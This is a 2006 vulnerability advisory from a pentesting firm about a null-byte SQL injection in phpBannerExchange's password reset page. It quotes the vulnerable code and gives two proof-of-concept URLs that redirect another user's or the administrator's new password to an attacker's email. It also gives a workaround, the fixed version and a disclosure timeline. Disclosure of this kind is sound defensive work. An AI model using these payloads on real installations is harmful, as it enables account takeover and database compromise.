[Full-disclosure] Advisory: Unauthorized password recovery in phpBannerExchange

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13199
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

Advisory: Unauthorized password recovery in phpBannerExchange

RedTeam identified an SQL injection that can be triggered due to a bad user input sanitization in phpBannerExchange. It is possible to recover a password of an user and thereby overtake his account.

Details

Product: phpBannerExchange Affected Versions: All versions up to phpBannerExchange 2.0 RC5 Fixed Versions: 2.0 RC6 Vulnerability Type: Bad user input sanitization, SQL injection Security-Risk: medium Vendor-URL: http://www.eschew.net/scripts/phpbe/2.0/ Vendor-Status: informed, fixed version released Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt Advisory-Status: public CVE: CVE-2006-3013 CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013

Introduction

From the vendor's homepage: phpBannerExchange is a PHP/mySQL script that allows virtually anyone with minimal knowledge of PHP, mySQL and web hosting to run their own banner exchange.

More Details

If a user forgot the password of his phpBannerExchange account, he can reset it by supplying his email address. In "resetpw.php" the variable $email contains this email address, which is then validated by a regular expression.

[...] 42 if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)@[a-z0-9-]+(\.[a-z0-9-]+) (\.[a-z]{2,3})$", $email)){ [...]

Due to a bug in the implementation of eregi(), it is possible to pass additional characters by using a Null Byte "\0". Because the backend of eregi() is implemented in C, $email is treated as a zero-terminated string. All characters starting from the Null Byte on will not be recognized by the regular expression. Therefore you can pass an email address, that includes the special character "'" to break the following SQL query:

[...] 48 $get_info=mysql_query("select * from banneruser where email='$email'"); [...]

After that, a new password for the chosen user is generated and sent via

[...] 68 mail($email,$usrsubject,$usrcontent,"From: $ownermail"); [...]

Note that mail() will treat $email as a zero-terminated string, too. Thereby, an attacker can reset the password of a user account and send it to his own email address.

Proof of Concept

Use following URLs with your favorite web browser:

http://example.com/phpbe/resetpw.php? submit=&email=attacker@example.com%00'or email='victim@example.com

to retrieve the password of the user with the email address "victim@example.com" or

http://example.com/phpbe/resetpw.php? submit=&email=attacker@example.com%00'or id='1

to retrieve the password of the user with user id "1".

Workaround

Use PHP Magic Quotes.

Fix

Upgrade to version 2.0 RC6

Security Risk

The security risk is high because an attacker could gain access to an administrator account and view and alter the database and hereby compromise the whole application.

History

2006-06-09 Discovery of the problem 2006-06-10 Vendor is informed 2006-06-12 Vendor released fixed version

References

[1] http://www.eschew.net/scripts/phpbe/2.0/

RedTeam

RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories.

More information about RedTeam can be found at http://www.redteam-pentesting.de.

-- RedTeam Pentesting Tel.: +49-(0)241-963 1300 Dennewartstr. 25-27 Fax : +49-(0)241-963 1304 52068 Aachen http://www.redteam-pentesting.de